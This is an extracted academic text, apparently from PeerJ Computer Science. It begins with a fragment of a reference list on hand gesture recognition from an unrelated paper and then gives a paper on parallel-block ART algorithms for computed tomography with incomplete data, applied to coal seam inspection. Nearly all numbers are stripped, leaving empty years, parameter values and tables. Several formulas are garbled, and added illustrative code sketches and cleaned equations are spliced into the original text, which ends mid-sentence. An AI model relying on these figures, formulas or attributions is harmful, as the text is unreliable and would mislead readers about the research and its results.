.figshare. .v https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. andrés gj, marco eb. . real-time hand gesture recognition with emg using machine learning. in: ecuador technical chapters meeting etcm. piscatway: ieee, – . anna y, sung mc, jae-gon k. . detection and recognition of hand gesture for wear- able applications in iomt. in: international conference on advanced communication technology icact. piscatway: ieee, – . anshal j, heidy s, emmanuel a. . american sign language translation using edge detection and cross correlation. in: colombian conference on communications and computing colcom. piscatway: ieee, – . arpita rs, sanyal g, majumder s. . hand gesture recognition systems: a survey. international journal of computer applications : – . ashish sn, aarti ga. a. 
bilingual sign recognition using image based hand gesture technique for hearing and speech impaired people. in: international conference on computing communication control and automation iccubea. piscatway: ieee, – . ashish sn, aarti ga. b. sign language recognition using image based hand gesture recognition techniques. in: international conference on green engineering and technologies ic-get. piscatway: ieee, – . atharva ak, apurv dj. . dynamic hand gesture recognition using kinect. in: innovations in power and advanced computing technologies i-pact. piscatway: ieee, – . biyao s, yifeng x, hongnan y, yatong j, chenggang y, hongtao x, yangang w. . a new dataset for hand gesture estimation. in: global conference on signal and information processing globalsip. piscatway: ieee, – . bradley lj. . it’s happening now: perceptual computing is real. webopedia. available at http://www.webopedia.com (accessed on may ). chenyang l, xin z, lianwen j. . lpsnet: a novel log path signature feature based hand gesture recognition framework. in: international conference on computer vision workshops iccvw. piscatway: ieee, – . chenyang z, yingli t, matt h. . multi-modality american sign language recog- nition. in: international conference on image processing icip. piscatway: ieee, – . chun-jen t, yun-wei t, song-ling h, ya-chiu w. . synthetic training of deep cnn for d hand gesture identification. in: international conference on control. artificial intelligence. robotics & optimization iccairo. piscatway: ieee, – . danling l, yuanlong y, huaping l. . gesture recognition using data glove: an extreme learning machine method. in: international conference on robotics and biomimetics robio. piscatway: ieee, – . david vr, donghan k. . hand gestures recognition using machine learning for control of multiple quadrotors. in: sensors applications symposium sas. piscatway: ieee, – . deepali nk, chitode js. . dynamic hand gesture recognition: a literature review. international journal of engineering research & technology : – doi . /ijret. . . yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.webopedia.com http://dx.doi.org/ . /ijret. . http://dx.doi.org/ . /peerj-cs. deepali n, milind k. . real time sign language recognition using the leap motion controller. in: international conference on inventive computation technologies icict, vol. . piscatway: ieee, – . devendrakumar hp, kakade sm. . dynamic hand gesture recognition using kinect sensor. in: international conference on global trends in signal processing. information computing and communication icgtspicc. piscatway: ieee, – . donq-liang l, wei-shiuan y. . recognition of complex static hand gestures by using the wristband-based contour features. iet image processing : – doi . /iet-ipr. . . eko p, surya s, rafiidha sl. . classification of hand gesture in indonesian sign language system using naive bayes. in: international seminar on sensors. instrumen- tation. measurement and metrology. piscatway: ieee, – . elecbits. . gesture control robotic vehicle. available at http://www.elecbits.in/ product/gesture-control-robotic-vehicle (accessed on may ). erhan a, hakan t, baran u. . hand gesture classification using inertial based sensors via a neural network. in: international conference on electronics, circuits and systems. piscatway: ieee, – . fabian s, thomas k, alexander g, uwe h. . free-hand gesture recognition with d-cnns for in-car infotainment control in real-time. 
in: international conference on intelligent transportation systems itsc. piscatway: ieee, – . fuchang y, hijian s. . research on static hand gesture recognition technology for human computer interaction system. in: international conference on intelligent transportation. piscatway: ieee, – . gunawardane pdsh, nimali tm. . comparison of hand gesture inputs of leap motion controller & data glove in to a soft finger. in: international symposium on robotics and intelligent sensors iris. piscatway: ieee, – . hafız ma-r, lehmia k, danish mirrani m, noman maraaj m. . cmswvhg- control ms windows via hand gesture. in: international multi-topic conference inmic. piscatway: ieee, – . haitham b, alaa h, sabah h. . new method for optimization of static hand gesture recognition. in: intelligent systems conference intellisys. piscatway: ieee, – . hang z, jiangping h, yuping z, hong c. . hand gesture based control strategy for mobile robots. in: chinese control and decision conference ccdc. piscatway: ieee, – doi . /ccdc. . . hari pg, haresh sc, siddhartha m, tanima d, kulwant s. . a continu- ous hand gestures recognition technique for human-machine interaction using accelerometer and gyroscope sensors. sensors journal : – doi . /jsen. . . hexa r. . gesture recognition market analysis by technology d. d. by application tablets & notebooks. smartphones. gaming consoles. smart televisions. in: laptops & desktops and segment forecasts – . piscatway: ieee, – . yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /iet-ipr. . http://www.elecbits.in/product/gesture-control-robotic-vehicle http://www.elecbits.in/product/gesture-control-robotic-vehicle http://dx.doi.org/ . /ccdc. . http://dx.doi.org/ . /jsen. . http://dx.doi.org/ . /peerj-cs. himadri ns, shinjini r, sudipta s, sayan t, suhrid kc. . a machine learning based approach for hand gesture recognition using distinctive feature extraction. in: computing and communication workshop and conference. piscatway: ieee, – . ibrahim a, hashim a, faisal k, youngwook k. . hand gesture recognition using input impedance variation of two antennas with transfer learning. sensors journal : – . isack b, zhongfu y, jamal b. . higher-order local autocorrelation feature extraction methodology for hand gestures recognition. in: international conference on multime- dia and image processing icmip. piscatway: ieee, – . jakub t, tomasz m, piotr k. . influence of semg electrode matrix configuration on hand gesture recognition performance. in: signal processing: algorithms, architectures, arrangements and applications spa. piscatway: ieee, – . javier opa, paula cum, robinson jm. . convolutional neural network architecture for hand gesture recognition. in: international conference on electronics, electrical engineering and computing. piscatway: ieee, – . jessie rb, dionis ap, felicito sc, janette cf, carlos ch, cyrel om, christine ksb, ezra gf, lanuelle tv. . sign language word translator using neural networks for the aurally impaired as a tool for communication. in: international conference on control system. computing and engineering iccsce. piscatway: ieee, – . jiajun z, zhiguo s. . deformable deep convolutional generative adversarial network in microwave based hand gesture recognition system. in: international conference on wireless communications and signal processing wcsp. piscatway: ieee, – . jian z, jingna m, guijin w, huazhong y, bo z. . 
a miniaturized wearable wireless hand gesture recognition system employing deep-forest classifier. in: biomedical circuits and systems conference. piscatway: ieee, – . jinxing y, jianhong p, jun l. . semg-based continuous hand gesture recognition using gmm-hmm and threshold model. in: international conference on robotics and biomimetics robio. piscatway: ieee, – . jose c, flores l, gladys cutipa ae, lauro enciso r. . application of convolutional neural networks for static hand gestures recognition under different invariant fea- tures. in: international conference on electronics, electrical engineering and computing. piscatway: ieee, – . jozef g, slavomír k. . hand gesture recognition using d sensors. in: international symposium elmar. piscataway: ieee, – . karthik sk, akash s, srinath r, shitij k. . recognition of human arm gestures using myo armband for the game of hand cricket. in: international symposium on robotics and intelligent sensors iris. – . kuang-yow l, chun-chieh c, yong-jie h, wen-tsai s. . wearable armband for real time hand gesture recognition. in: international conference on systems, man and cybernetics. piscatway: ieee, – . lalit k, pritee k. . vision-based mid-air unistroke character input using polar signatures. transactions on human-machine systems : – doi . /thms. . . yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /thms. . http://dx.doi.org/ . /peerj-cs. laura d, angelo ms, paolo d. . a survey of glove-based systems and their applica- tions. ieee transactions on systems, man, and cybernetics : – . marco eb, andrés gj, jonathan az, andrés p, víctor ha. a. hand gesture recognition using machine learning and the myo armband. in: european signal processing conference. piscatway: ieee, – . marco eb, cristhian m, jonathan az, andrés gj, carlos ea, patricio z, marco s, freddy bp, maría p. b. real-time hand gesture recognition using the myo armband and muscle activity detection. in: second ecuador technical chapters meeting etcm. piscatway: ieee, – . margaret r. . analytics tools help make sense of big data. aws. available at http: //searchbusinessanalytics.techtarget.com (accessed on may ). marlon o, alistair s, mohamed f. . two-stage pca with interpolated data for hand shape recognition in sign language. in: applied imagery pattern recognition workshop aipr. – . meenakshi p, pawan singh m. . hand gesture recognition for human computer interaction. in: international conference on image information processing. piscatway: ieee, – . microsoft. . kinect gestures. available at https://support.xbox.com/en-us/xbox- /accessories/body-controller (accessed on may ). moher d, liberati a, tetzlaff j, altman dg. . prisma group. preferred reporting items for systematic reviews and meta-analyses: the prisma statement. plos medicine :e doi . /journal.pmed. . mohini g, rohini r, reddy pevv, bhanu prakash p, kumar ktps. . gesture controlled metal detecting land rover. international journal of engineering trends and technology : – . nabeel s, rosa hm, chan rhm. . a wearable hand gesture recognition device based on acoustic measurements at wrist. in: international conference of the ieee engineering in medicine and biology society embc. piscatway: ieee, – doi . /embc. . . nilima mp, patil sr. . review on real-time emg acquisition and hand gesture recognition system. in: international conference of electronics. communication and aerospace technology iceca. piscatway: ieee, – . oinam rc, anushree p, spandan s, piyanka d. . 
implementation of the computer tomography parallel algorithms with the incomplete set of data

mariusz pleszczyński
faculty of applied mathematics, silesian technical university of gliwice, gliwice, Śląskie, poland

abstract
computer tomography has a wide field of applicability; however, most of its applications assume that the data obtained from the scans of the examined object satisfy the expectations regarding their amount and quality. unfortunately, such data sometimes cannot be obtained, and we then deal with an incomplete set of data. in this paper we consider an unusual case of such a situation, which may occur when access to the examined object is difficult. previous research conducted by the author showed that ct algorithms can be used successfully in this case as well, but the reconstruction time is problematic. one possibility for reducing the reconstruction time is to execute the calculations in parallel. in the analyzed approach the system of linear equations is divided into blocks, such that each block is operated on by a different thread. until now such investigations had been performed only theoretically. in the current paper the usefulness of the parallel-block approach proposed by the author is examined. the conducted research shows that, also for an incomplete data set, it is possible to select optimal values of the reconstruction parameters in the analyzed algorithm, and to obtain (for a given number of pixels) a reconstruction with a given maximum error. the paper indicates the differences between the classical problem of ct and the one examined here. the obtained results confirm that the real implementation of the parallel algorithm is also convergent, which means it is useful.

subjects artificial intelligence, computer aided design, computer vision, optimization theory and computation, scientific computing and simulation
keywords computer tomography, parallel algorithms, incomplete set of data, big data, signal and data processing

introduction
computer tomography has a very wide field of applicability. apart from the classical application in medicine (donegani et al., ), for which the concepts and the first tomograph were developed (hounsfield, ), the methods of computer tomography are used in many other areas as well. in general, computer tomography finds an application whenever there is a need to examine the interior of an object without affecting its structure (cozzolino et al., ; gong, nie & xu, ; yao, liu & xu, ; kamath et al., ).
the whole process of tomographic examination can be divided into two main stages: collection of the data and transformation of these data into an image. the research concerning the first stage deals with selecting the radiation beam and the radiation type, or with minimizing the necessary radiation dose, which is especially important in medical tomography (malczewski, ). the second stage assumes that the data are already collected and ready to be transformed into an image of the interior of the investigated object. this part is executed with the aid of selected reconstruction algorithms. such algorithms can be divided into two groups: analytical algorithms (averbuch & shkolnisky, ; lewitt, ; waldén, ) and algebraic algorithms (andersen, ; gordon, bender & herman, ; guan & gordon, ). the former group performs very well in the classical applications of computer tomography, when the collected data satisfy the assumption of the kotelnikov theorem (natterer, ), which states, in general, that the initial data must be sufficiently numerous and of sufficiently good quality. however, sometimes this assumption is impossible to fulfill, for example because of the size of the examined object or its inaccessibility. we then have the situation of an incomplete data set. as studies have shown, the application of analytical algorithms is ineffective in the case of an incomplete data set, whereas the algebraic algorithms can be used successfully (hetmaniok, ludew & pleszczyński, ). the approach for the case of an incomplete set of data is important with respect to possible applications, for example in the examination of a mine coal seam (see "problem with the incomplete set of data"). the seam of coal may include accumulations of unwanted rocks (which is important for economic reasons) or areas of compressed gas (which is even more important for safety reasons). the compressed gas may explode during coal seam exploitation, causing rock and gas ejections and bumps that are extremely dangerous for the life and health of the working people. for example, in polish coal mines, in the second half of the twentieth century, miners died for this reason. the biggest catastrophe of this kind happened in september in the coal mine in nowa ruda, where miners were killed. obviously there exist methods of examining the mine coal seam before its exploitation, but these methods are invasive, time- and energy-consuming, which means that they are not very safe and significantly increase the mining costs.
the research conducted so far shows that selected algorithms belonging to the group of algebraic algorithms can be applied for solving the problem with an incomplete set of data (for example in the examination of a mine coal seam); however, the specifics of the data received in this way cause the reconstruction process to take significantly more time than in the classical approach. therefore, algorithms using parallel computations are proposed, the aim of which is to reduce the time needed to examine the internal structure of the studied object. until now such algorithms have been developed and studied only theoretically (hetmaniok, ludew & pleszczyński, ), and simulated only for a one-thread process. the goal of the current paper is to investigate the convergence of such algorithms in the case when the parallel computations are executed with a real application of several cores/threads. this study will be the ground for further research on the effectiveness of these algorithms in comparison with the sequential algorithms.

ideas of the computer tomography
assuming that the distribution of density in the interior of the examined object is described by means of a function f(x,y) (which can be a continuous function as well as a discrete function), computer tomography is meant to reconstruct this function on the basis of scans of the object along some paths l. each scan (projection) informs how much energy is lost by the given ray along the given path. since every sort of matter is characterized by an individual absorption of energy (e.g., for x-rays, where the reference is water, with its assigned material density (kg/m³) and attenuation coefficient (hounsfield units, hu); muscle tissue, blood and bone are each characterized by their own density and hu values), the function f(x,y) can be retrieved on the ground of such data, described by the equation

p = p_L = -\ln(I_1 / I_0) = \int_L f(x,y) \, dl,

where l denotes the mentioned path, p_L means the projection obtained along this path, I_0 is the initial intensity of radiation, whereas I_1 is the final intensity. at the beginning of the last century it was proven (radon, ) that the reconstruction of the function f(x,y) is possible based on infinitely many projections. the assumption of possessing infinitely many projections is impossible to fulfill in real life. in practice it is possible to get only a finite number of projections; therefore, very important for the development of computer tomography are the works (louis, a, b) presenting the conditions connecting the number of projections (this number consists of the number of scanning angles and the number of rays in one beam) with the possibility of reconstructing the function f(x,y). the analytical algorithms mentioned above are based, among others, on the fourier and radon transforms, and also on the concept of filtered backprojection; therefore they cannot be used for projections of insufficiently good quality. for this reason we will consider only the algebraic algorithms.

algebraic algorithms
in the algebraic algorithms it is assumed that the examined object is located in a rectangle (or, very often, a square), which can be divided into N = n² smaller congruent squares (pixels). the size of these pixels allows us to assume that the reconstructed function f(x,y) takes an unknown constant value in each pixel.
thanks to this, by knowing the initial energy of radiation and the energy of the given ray after passing through the investigated object (in this way we know the value of the lost energy, that is the value of the projection), the equation of the path traversed by the ray, the density of discretization (the number of pixels), and keeping in mind the fact that every sort of matter is characterized by an individual capacity of energy absorption, we can calculate the total energy loss for the given ray (the value of the projection) as the sum of the energy losses in every pixel met by the ray. the loss of energy in one pixel is proportional to the distance traveled by the ray in this pixel (this value is known) and to the unknown value of the function f(x,y) in this pixel (the values of this function are to be found). considering every ray individually we obtain a system of linear equations (a single scan is represented by one row of this system):

Ax = b,

where A denotes a matrix of dimension m × N containing non-negative real elements, m means the number of projections and N = n² means the number of pixels, x denotes a vector of length N containing the unknown elements—each ith element of this vector represents the unknown constant value of the reconstructed function f(x,y) in the ith pixel—and b is a vector of length m containing the projections. the algebraic algorithms differ from each other in the method of solving this system. matrix A has some specific characteristics:
- it is a sparse and nonsymmetric matrix (the vast majority of elements are equal to zero; it is easy to notice that a single row of length N has only of the order of n nonzero elements),
- it is not a square matrix (mostly there are definitely more rows than columns),
- it is a nonsingular matrix,
- its dimension is very big,
therefore for solving the system Ax = b we cannot apply the classical methods dedicated to the solution of systems of linear equations.

kaczmarz algorithm
most of the algebraic algorithms are based on the kaczmarz algorithm, the convergence of which was proven at first for square systems (kaczmarz, ) and next also for rectangular systems (tanabe, ). this algorithm starts by selecting any initial solution x^(0) ∈ R^N, and every successive approximation of the solution x^(k) is computed as the orthogonal projection of the previous solution onto the hyperplane H_i, i = ((k − 1) mod m) + 1, where the hyperplane H_i is represented by the respective row of the system, that is

H_i = { x ∈ R^N : a_i ∘ x = p_i },

where the operation ∘ is the classic scalar product of vectors from the space R^N, a_i denotes the ith row of matrix A, and p_i means the ith projection, that is p_i = b_i is the ith element of vector b. the geometric interpretation of this algorithm is presented in fig. .

algorithm art
for many years the kaczmarz algorithm was not applied. thanks to the papers (gordon, bender & herman, ; tanabe, ) it was modified into the algorithm art and in this form it has found an application in computer tomography. algorithm art, similarly to the kaczmarz algorithm, starts by choosing any initial solution x^(0) ∈ R^N, and the next approximations of the solution are created by means of the relation

x^{(k+1)} = x^{(k)} + \lambda_k \, \frac{p_i - a_i ∘ x^{(k)}}{\|a_i\|^2} \, a_i,

where the same notations hold as before; additionally ||·|| means the norm (length) of a vector and λ_k ∈ R denotes the relaxation coefficient.
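to make the update rule above concrete, here is a minimal numpy sketch of one art sweep over the rows of Ax = b. it is only an illustration under assumed toy data, not the author's implementation; the variable names and the toy system are made up for the example.

```python
# a minimal sketch of one relaxed kaczmarz/art sweep:
# x <- x + lambda * (p_i - a_i . x) / ||a_i||^2 * a_i, cycling over all rows.
import numpy as np

def art_sweep(A, b, x, lam=1.0):
    """perform one full iteration (one pass over all m rows) of relaxed kaczmarz/art."""
    for i in range(A.shape[0]):
        a_i = A[i]
        norm_sq = a_i @ a_i
        if norm_sq == 0.0:          # skip empty rows (a ray that missed the pixel grid)
            continue
        residual = b[i] - a_i @ x   # p_i - a_i . x
        x = x + lam * residual / norm_sq * a_i
    return x

# toy usage: a small overdetermined, consistent system
A = np.array([[1.0, 0.5], [0.2, 1.0], [1.0, 1.0]])
x_true = np.array([2.0, 3.0])
b = A @ x_true
x = np.zeros(2)
for _ in range(50):
    x = art_sweep(A, b, x, lam=1.0)   # lam = 1 corresponds to the plain kaczmarz projection
print(x)  # approaches x_true
```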
similarly to the other algorithms discussed in this paper, we can speed up the convergence of the art algorithm by using a physical property of the studied phenomenon—each sort of matter is characterized by a specific capacity of absorbing the energy of penetrating radiation. the value describing this capacity is nonnegative; therefore, after determining the solution x^(k+1) we act on it with the operator C, called in the literature the constraining operator, taking in this paper the following form

C : R^N → R^N,  C(x_1, x_2, …, x_N) = (y_1, y_2, …, y_N),

where

y_i = x_i for x_i ≥ 0, and y_i = 0 for x_i < 0, 1 ≤ i ≤ N.

several years after introducing the art algorithm, it was proven in the paper (trummer, ) that this algorithm is convergent if 0 < λ_k = λ < 2, whereas in the case when λ does not have to be constant, the art algorithm is convergent if 0 < liminf λ_k ≤ limsup λ_k < 2. in the specific case when λ_k = λ = 1 the art algorithm is the kaczmarz algorithm. obviously there exist many other algebraic algorithms, like for example the algorithms art- (herman, ), mart (gordon, bender & herman, ; verhoeven, ), sirt (gilbert, ), sart (andersen & kak, ) and others. we focus in the current paper on the art algorithm (and its parallel adaptations) because, as the research shows, the other algorithms are characterized by a similar convergence rate and the art algorithm is simple to implement, which is its great advantage.

figure: geometric interpretation of the kaczmarz algorithm.

the algebraic algorithms, adapted to the problem with an incomplete set of data, appeared to be convergent, stable and able to detect non-transparent elements, which means that they are very useful (hetmaniok, ludew & pleszczyński, ). however, the main disadvantage of these algorithms is their convergence speed—relatively few iterations are required for solving the problem with a complete set of data (one iteration means the consideration of all rows of the system, that is the execution of all m projections), whereas a few hundred, or even more than one thousand, iterations are often needed for solving the problem with an incomplete set of data. the stopping condition for the art algorithm (as well as for the other algorithms discussed in this article) can be defined as an assumed number of executed iterations or an assumed precision of the obtained approximate solution. systems of algebraic linear equations similar to the considered one are overdetermined and, as a rule, inconsistent. the kaczmarz method and its modifications then converge to some "pseudosolution". research concerning this subject was also performed—one can notice that the successive approximate solutions, after reaching some level of precision, "circulate" around the theoretical exact solution; however, they are contained within some N-dimensional sphere whose central point is located at this exact solution and whose radius is proportional to the level of error burdening the input data. one of the possibilities to overcome the described disadvantage consists in applying parallel calculations in the process of determining the solution of the system Ax = b. among the many algorithms using this approach we select the parallel block algorithms.
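before turning to the parallel variants, a small follow-up to the art sketch above shows how the constraining operator C just defined—clamping negative components to zero—can be applied after each sweep. it builds on the illustrative art_sweep helper from the previous sketch and is an assumption-laden illustration rather than the paper's code.

```python
# the constraining operator c as a non-negativity clamp applied after each art sweep;
# art_sweep is the illustrative helper defined in the previous sketch.
import numpy as np

def constrain(x):
    """operator c: keep nonnegative components, replace negative ones by zero."""
    return np.maximum(x, 0.0)

def constrained_art(A, b, n_iters=100, lam=1.0):
    # lam is assumed to lie in (0, 2), the relaxation range discussed above
    x = np.zeros(A.shape[1])
    for _ in range(n_iters):
        x = constrain(art_sweep(A, b, x, lam))  # one sweep, then project onto x >= 0
    return x
```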
parallel block algorithms
parallel block algorithms are created to use the parallel work of many processors/threads; however, the number of threads is relatively small (unlike in the case of using the threads of graphics cards with cuda technology). the general concept of these algorithms consists in the partition of the system Ax = b into blocks (the number of blocks corresponds to the number of used threads), so that the set of indices of the rows of matrix A is presented in the form of the sum {1, 2, …, m} = B_1 ∪ B_2 ∪ … ∪ B_M, where, in the standard approach, we have B_i ∩ B_j = Ø for i ≠ j, and the cardinalities of the sets B_i, 1 ≤ i ≤ M, are more or less equal (very often the blocks are formed so that the first block includes roughly the first m/M rows, the second block includes the next m/M rows, and so on). the blocks work in parallel in such a way that they have the same initial vector (starting solution) x^(k); in every block the algorithm (for example the art algorithm) is performed on the rows of matrix A belonging to this block, and next, after executing one iteration (using all available rows of the block), the approximate solution y^(k,i), 1 ≤ i ≤ M, from each block is returned. after that the solutions are averaged and such an averaged solution x^(k+1) can serve as the initial solution for all blocks in the next iteration. a graphical illustration of the parallel block algorithm is presented in fig. ; a further figure shows the bp (block) algorithm in more detail. assuming the partition of matrix A into blocks (the vector b of projections is partitioned in the same way), the parallel block algorithm pb (introduced by the author) can be presented in the following way: we select the initial solution x^(0), and we calculate the solution x^(k+1) according to the formula
however in the considered case we are very far from this situation—the scans are performed only between two opposite walls, which means that the scanning angles are included within the right angle, so one can say that we have % of data in our disposal (this estimation is still too optimistic). the author analyzed such situation and came to the conclusion that the interior of the figure scheme of the parallel block algorithm. full-size doi: . /peerj-cs. /fig- pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ examined object can be reconstructed also in such conditions (convergence, stability, influence of noises, occurrence of non-transparent elements were investigated), but this reconstruction takes quite a long time. therefore the solutions, different than the ones used in various classical approaches, were sought and are still required (the author tested them in his cited paper), like: selection (on the way of appropriate investigations) of optimal values of parameters, other sorts of algorithms, sorting the rows in matrix of the system of equations, introduction of chaotic and asynchronous algorithms, introduction of parallel algorithms (parallel-block and block-parallel). separate application of these approaches (or of their combinations) caused, the most often, the improvement of the convergence speed, however this improvement was not big enough to accept it as sufficient. similar studies were also carried out in other studies (e.g., jiang & wang ( ), most often assuming a complete set of data—therefore this case requires separate studies). for example, sørensen & hansen ( ) shows that the row sorting effect of a does not significantly improve time. many authors have studied block and parallel algorithms (also block parallel algorithms), including graphs, many other approaches were also used (a large part of them was also investigated by the author for this issue) (censor et al., ; drummond et al., ; elfving & nikazad, ; gordon & gordon, ; sørensen & hansen, ; torun, manguoglu & aykanat, ; zhang & sameh, ). as we mentioned before, the computer tomography, considered in its classical sense, requires the projection of a very good quality (many scanning angles, many rays in one beam). however in study of some problems, like for example in examination of the mine coal seam, the size of investigated object or difficult access to it does not allow to get such type of projection. then we have the problem with the incomplete set of data. the most often we can use the data obtained only between two opposite walls of the studied object (such system will be called the ( × ) system), and sometimes between pairs of two opposite walls (such system will be called the ( × , × ) system). system ( × ) is presented in fig. and an example of its application (coal seam testing) is shown in the fig. . mathematical models of phantoms in the seam of coal, in which we search for dangerous areas of compressed gas or unwanted interlayers of barren rocks, the distribution of density is discrete and the densities of included elements differ from each other. therefore the models used for testing the convergence of discussed algorithms possess the discrete distribution of high contrast. 
thus, the two-dimensional function describing the distribution of density takes the following form f ðx; yÞ ¼ c ; ðx; yÞ d � e; c ; ðx; yÞ d � e; cs; ðx; yÞ ds � e; >>< >>: ( ) where ci r, ≤ i ≤ s, e = {(x,y) − ≤ x, y ≤ }, and the regions di, ≤ i ≤ s, are disjoint (more precisely, the area if their common part is equal to zero). pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an additional parameter, affecting the convergence of investigated algorithm pb, is the number of sources and detectors. this parameter is denoted by pkt and influences directly the dimension of matrix a of system ( )—it determines the number of rows in this matrix. we assume in this article that the number of sources and detectors are equal and we reject (for uniqueness—we eliminate the case when the ray runs along the mesh discretizing the square e) the first and the last projection. then we have m = pkt − . results of experiments to show that the pb algorithm is convergent in practise (not only in theory) one has to prove that it is possible to select the optimal values of parameters m and λ for the given resolution (number of pixels n = n), similarly like in case of the sequential algorithms. obviously, for such selected values of reconstruction parameters it should be possible to retrieve the sought function with the given precision. table presents the times needed to achieve the error Δ < . in reconstruction of function f (x,y) for n = with the use of threads, depending on the values of parameters m and λ, whilst d ¼ max �i�n f ðpikiÞ � ~f ðpikiÞ �� �� ( ) figure system ( × ) where —sources of rays, —object under research, —rays, —detectors. full-size doi: . /peerj-cs. /fig- as the research shows, the exact optimal values are impossible to determine, because they depend on various ele- ments, like the expected value of para- meter l, form of function f (x, y), the system of data collection and so on. whereas it is possible to observe some approximate relation between these values. pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ e figure the scheme of a coal bed working: —sources; —detectors; —unmined coal; —heading; —longwall with mechanized lining, belt conveyor flight, heading machine so on; —caving or filling; e—researching coal bed. full-size doi: . /peerj-cs. /fig- table dependence of the reconstruction time [s] for the given n on the values of parameters m and λ (value > means the time longer than s). λ ↓ m → . > > > > > > . . . . . > > > . . . . . . . . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > > > > > > > > λ b m → . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where piki is the ith pixel, f denotes the exact values of sought function, whereas ~f describes its reconstructed values. error ( ) takes this form only in the initial stages of algorithm usability testing. we then refer to an exact solution, which we do not know of course in real cases. 
however, such an approach has an undoubted advantage—by conducting a series of experiments, we can estimate the number of iterations (for given values of the reconstruction parameters) to obtain a given quality of reconstruction. the obtained results are like expected. the shortest time is for m = and λ = . (more detailed investigation around this value of λ, with step . , showed that this is the best result in this case). calculations executed for other resolutions and other functions describing the distribution of density gave similar results concerning the proportion of n to m and to the value of λ. the literature (see e.g., gordon & gordon, ) shows that in the case of a complete set of data, the selection of the optimal λ parameter depends heavily on the number of threads. the fig. shows the reconstruction time (quotient of the time tλ for obtaining the error ( ) Δ < . for a given value of λ and for a given number of threads and the time tmax maximum for this number of threads) from the number of threads th. in the case of a incomplete set of data, the situation is different. for any number of threads, the optimal value for λ is similar. the results for the number of threads , and are also interesting: the algorithm converges there for . ≤ λ ≤ (the fig. it is shown for λ ≤ ). table presents optimal values of the λ parameter for the step s = . and for the step s = . . the research was carried out for many different functions of the density distribution and for many values of the reconstruction parameters selected for these functions. we now present graphically the obtained results for two selected examples. the first presented t t figure dependence of the reconstruction on λ parameter value for an equal number of threads. full-size doi: . /peerj-cs. /fig- pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ function of the density distribution will be the function f , which according to the formula ( ) takes the form f ðx; yÞ ¼ ; ðx; yÞ ½� : ; � : � ½� : ; : ; ðx; yÞ ½� : ; : � ½� : ; : ; ðx; yÞ ½� : ; : � ½ : ; : ; ðx; yÞ ½ : ; : � ½ : ; : ; otherwise: >>>>< >>>>: figure presents the reconstruction of function f for n = , m = , λ = . and threads. figure presents the error Δ (see ( )) of this reconstruction. the second presented function of the density distribution will be the function f , which according to the formula ( ) takes the form f ðx; yÞ ¼ ; ðx; yÞ ½ ; : � ½ : ; : ; ðx; yÞ ½� : ; � ½� : ; : ; ðx; yÞ ½� : ; � : � ½� : ; : ; ðx; yÞ ½ ; : � ½� : ; � : ; otherwise >>>>< >>>>: figure presents the reconstruction of function f for n = , m = , λ = . and threads. figure presents the error Δ (see ( )) of this reconstruction. figure reconstructed function f (x,y) for n = , m = , λ = . and threads. full-size doi: . /peerj-cs. /fig- table optimal values of the λ parameter for the step s = . and for the step s = . . s ↓ th → . . . . . . . . . . . . . . . . . . . . . . pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the next figures (figs. and ) we demonstrate, for selected examples, the correctness of behavior of the reconstruction parameters, that is, more precisely, the number of iterations required to obtain the given error Δ depending on the number of blocks, together with the time needed to execute , iterations depending on the number of blocks. 
figure the error Δ of the reconstruction of the function f (x,y) for n = , m = , λ = . and threads. full-size doi: . /peerj-cs. /fig- figure reconstructed function f (x,y) for n = , m = , λ = . and threads. full-size doi: . /peerj-cs. /fig- pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ computer programs, realizing the presented research, were written in the following languages: c# from visual studio and mathematica . the study was conducted with the aid of computer with windows professional system, equipped with gb ram, processor intel core i . ghz ( threads). it is also worth to mention that the largest considered systems of equations possessed , unknown elements (n = ) and were composed from , equations (m = ) and the data concerning the coefficients of such systems used more that gb of disk space. figure the error Δ of the reconstruction of the function f (x,y) for n = , m = , λ = . and threads. full-size doi: . /peerj-cs. /fig- figure the number of iterations (iter.) needed to get the error Δ < . depending on the number of blocks, n = , m = , λ = , f (x,y). full-size doi: . /peerj-cs. /fig- pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusions the conducted investigations, presented in this article, show that the introduced pb algorithm is useful, also in practice. for the assumed resolution one can select, with big precision, the values of other reconstruction parameters, in order to minimize the required calculations, however, the selection of optimal values of the reproduction parameters is of a different nature than in the classical task. dividing matrix a of equation system ( ) into blocks, the information about the examined object is poorer in each block (in comparison with information delivered by the full matrix a), therefore the number of iterations increases with the number of blocks. research has shown that this increase is linear. if we refer to the number of iterations for one thread, then as the number of 